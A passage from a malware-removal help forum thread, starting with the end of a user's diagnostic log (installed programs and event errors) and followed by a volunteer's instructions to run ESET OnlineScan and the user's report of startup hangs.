"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}" = Logitech SetPoint
"{F761359C-9CED-45AE-9A51-9D6605CD55C4}" = Evernote
"{F7B9B60F-DBB3-4116-967B-BA93E278331E}" = ActivePerl 5.10.1 Build 1007
"{FC053571-8507-44E4-8B6D-AACEAB8CA57C}" =  Sansa Media Converter
"{FF63121D-91C6-42CC-B341-F1AA729728E7}" = Microsoft Sync Framework 2.0 Core Components (x86) ENU
"7-Zip" = 7-Zip 9.10 beta
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe® Flash® Player 10 Plugin
"Amazing Windows XP Screen Saver_is1" = Amazing Windows XP Screen Saver 1.2
"a-squared Anti-Malware_is1" = a-squared Anti-Malware 4.0
"Audacity 1.3 Beta (Unicode)_is1" = Audacity 1.3.11 (Unicode)
"avast5" = avast! Free Antivirus
"AVS Update Manager_is1" = AVS Update Manager 1.0
"AVS Video Editor 4_is1" = AVS Video Editor 4
"AVS Video Recorder_is1" = AVS Video Recorder 2.4
"AVS YouTube Uploader 2.1_is1" = AVS YouTube Uploader version 2.1
"AVS4YOU Software Navigator_is1" = AVS4YOU Software Navigator 1.4
"Belarc Advisor" = Belarc Advisor 8.1
"BluesCluesPreschoolDKey" = Blue's Preschool
"Canon_IJ_Network_Scan_UTILITY" = Canon IJ Network Scan Utility
"Canon_IJ_Network_UTILITY" = Canon IJ Network Tool
"CCleaner" = CCleaner
"Coupon Printer for Windows5.0.0.0" = Coupon Printer for Windows
"D-Fend Reloaded" = D-Fend Reloaded 0.9.1 (deinstall)
"DiscJuggler" = DiscJuggler
"DriverAgent.exe" = DriverAgent by eSupport.com
"Emsisoft Anti-Malware_is1" = Emsisoft Anti-Malware 5.0
"F3B506E1FDAEA4DC6669B53B2D3F0B68FBA20C2D" = Windows Driver Package - AMD System  (04/06/2006 1.0.1.0)
"Fences" = Fences
"Fighter Ace Anniversary Edition" = Fighter Ace Anniversary Edition
"Find and Run Robot_is1" = Find+Run Robot 2.87.03
"Firebird SQL Server UK" = Firebird SQL Server - MAGIX Edition
"FlightGear_is1" = FlightGear v2.0.0
"Foxit Reader" = Foxit Reader
"gatesofandaron_is1" = Gates of Andaron 3.3
"GrabIt_is1" = GrabIt 1.7.2 Beta 4 (build 997)
"GTK 2.0" = GTK+ Runtime 2.14.7 rev a (remove only)
"Halo" = Microsoft Halo
"Handbrake" = Handbrake 0.9.4
"Holiday Snowflakes Screen Saver_is1" = Holiday Snowflakes Screen Saver 1.2
"ie8" = Windows Internet Explorer 8
"ImgBurn" = ImgBurn
"InfoTip Extension" = InfoTip Extension v2.0.4.106 (Unicode)(Remove Only)
"InstallShield_{4E25C468-7745-4051-8B37-4A2C6635BA8B}" = Update Manager B09.0908.1
"IObit Security 360_is1" = IObit Security 360
"kidthing-2.0.0" = kidthing beta v.2.0.0
"Kiwi Syslog Server" = Kiwi Syslog Server 9.1.0  (Standard Edition)
"LADSPA_plugins-win_is1" = LADSPA_plugins-win-0.4.15
"LAME for Audacity_is1" = LAME v3.98.2 for Audacity
"LogMeIn Hamachi" = LogMeIn Hamachi
"LucasArts' X-Wing vs. TIE Fighter" = LucasArts' X-Wing vs. TIE Fighter
"MAGIX Movie Edit Pro silver UK" = MAGIX Movie Edit Pro silver 8.6.0.17 (UK)
"MAGIX Speed burnR UK" = MAGIX Speed burnR
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox (3.6)" = Mozilla Firefox (3.6)
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"Native Instruments Controller Editor" = Native Instruments Controller Editor
"Native Instruments Guitar Rig 4" = Native Instruments Guitar Rig 4
"Native Instruments GuitarRig Mobile IO Driver" = Native Instruments GuitarRig Mobile IO Driver
"Native Instruments Rig Kontrol 3 Driver" = Native Instruments Rig Kontrol 3 Driver
"Native Instruments Service Center" = Native Instruments Service Center
"Native Instruments Session IO Driver" = Native Instruments Session IO Driver
"Notepad++" = Notepad++
"NVIDIA Display Control Panel" = NVIDIA Display Control Panel
"NVIDIA Drivers" = NVIDIA Drivers
"NVIDIA nView Desktop Manager" = NVIDIA nView Desktop Manager
"ObjectDock" = ObjectDock
"Office14.PROPLUS" = Microsoft Office Professional Plus 2010
"OpenAL" = OpenAL
"PhotoScape" = PhotoScape
"PictureItSuite_v11" = Microsoft Digital Image Suite 2006
"Pidgin" = Pidgin
"pidgin-otr" = pidgin-otr 3.2.0-1
"PrimoPDF" = PrimoPDF -- by Nitro PDF Software
"qt7lite_is1" = QT Lite 3.1.1
"QuickPar" = QuickPar 0.9
"ScummVM_is1" = ScummVM 1.0.0
"Smart Defrag_is1" = Smart Defrag
"SONAR85Producer_is1" = SONAR 8.5 Producer
"SUPER ©" = SUPER © Version 2010.bld.37 (Jan 2, 2010)
"The Great Festival Adventure" = Thomas & Friends - The Great Festival Adventure
"Tweak UI 2.10" = Tweak UI
"USB_AUDIO_DEusb-audio.deTascam" = US-122 MKII / US-144 MKII
"uTorrent" = µTorrent
"VFX_is1" = VFX v1.1 build 20091208
"VistaGlazz_is1" = VistaGlazz 2.0
"WallpaperToy" = Wallpaper Changer for Windows XP
"Wdf01005" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"Windows XP Video Screensaver Powertoy_is1" = Windows XP Video Screensaver Powertoy
"WinLiveSuite_Wave3" = Windows Live Essentials
"WinPcapInst" = WinPcap 4.1.1
"Winstep Organizer_is1" = Winstep Start Menu Organizer 1.2
"Winstep Xtreme_is1" = Winstep Xtreme 10.1
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"Yahoo! Widget Engine" = Yahoo! Widgets
"YInstHelper" = Yahoo! Install Manager
"YS FLIGHT SIMULATOR" = YS FLIGHT SIMULATOR
"ZMBV" = Zip Motion Block Video codec (Remove Only)

[color=#E56717]========== HKEY_CURRENT_USER Uninstall List ==========[/color]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
"Dropbox" = Dropbox
"Google Chrome" = Google Chrome
"Sansa Updater" = Sansa Updater
"Sparkplayer (Beta)" = Sparkplayer (Beta)
"UnityWebPlayer" = Unity Web Player

[color=#E56717]========== Last 10 Event Log Errors ==========[/color]

[ Application Events ]
Error - 5/4/2010 7:34:15 AM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application thomas_newline.exe, version 0.1.0.4, faulting
module binkw32.dll, version 1.5.3.0, fault address 0x00010068.

Error - 5/4/2010 7:37:37 AM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application thomas_newline.exe, version 0.1.0.4, faulting
module binkw32.dll, version 1.5.3.0, fault address 0x00010080.

Error - 5/7/2010 12:05:36 AM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application explorer.exe, version 6.0.2900.5512, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 5/8/2010 6:48:50 PM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 1.9.2.3667, hang module hungapp,
version 0.0.0.0, hang address 0x00000000.

Error - 5/8/2010 6:48:53 PM | Computer Name = ME | Source = Application Hang | ID = 1001
Description = Fault bucket 1662754865.

Error - 5/11/2010 2:19:20 PM | Computer Name = ME | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 1.9.2.3667, hang module hungapp,
version 0.0.0.0, hang address 0x00000000.

Error - 5/11/2010 3:44:13 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application , version 0.0.0.0, faulting module unknown, version
0.0.0.0, fault address 0x00000000.

Error - 5/11/2010 7:05:19 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regt.cfxxe, version 5.1.2600.5512, faulting module
a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

Error - 5/11/2010 7:05:41 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regt.cfxxe, version 5.1.2600.5512, faulting module
a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

Error - 5/11/2010 7:06:53 PM | Computer Name = ME | Source = Application Error | ID = 1000
Description = Faulting application regedit.exe, version 5.1.2600.5512, faulting
module a2hooks32.dll, version 5.0.0.27, fault address 0x000024df.

[ System Events ]
Error - 5/13/2010 8:44:32 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 10:20:34 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 11:20:41 AM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 12:20:43 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 1:32:49 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 3:08:49 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 4:10:07 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 5:10:05 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 6:46:01 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.

Error - 5/13/2010 7:46:09 PM | Computer Name = ME | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
THEM  that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{A0857F50-D473-47EC-.  The master browser is stopping or an election
is being forced.


< End of report >


MalwareBytes scan seems ok.

#12 schrauber

schrauber

    Mr.Mechanic


  • Malware Response Team
  • 24,794 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Munich,Germany
  • Local time:03:14 AM

Posted 17 May 2010 - 07:01 AM

Hi,

Looks good to me, how is it running now?

Let's run an online scan to check for some leftovers.



I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check
  • Click the button.
  • Accept any security warnings from your browser.
  • Check
  • Push the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push
  • Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Push the button.
  • Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
regards,
schrauber


If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware

#13 deesto


Posted 17 May 2010 - 08:14 AM

Hi schrauber,

QUOTE(schrauber @ May 17 2010, 08:01 AM)
Looks good to me, how is it running now?

Thanks. It's running pretty badly, actually. If it gets all the way through the Windows start-up process, it's generally ok, but it more often than not gets hung up while it's loading and becomes completely unresponsive, to the point where the machine must be manually turned off and back on to start over. No idea why.

QUOTE
Let's run an online scan to check for some leftovers.

OK, I'll give this a try later and report the results.



#14 schrauber


Posted 18 May 2010 - 04:25 PM

At startup, or every time?

QUOTE
but it more often than not gets hung up while it's loading and becomes completely unresponsive, to the point where the machine must be manually turned off and back on to start over. No idea why.

regards,
schrauber


#15 deesto


Posted 18 May 2010 - 09:37 PM

Almost every time, but only at start-up ... if it gets past the process of loading everything, it seems ok.



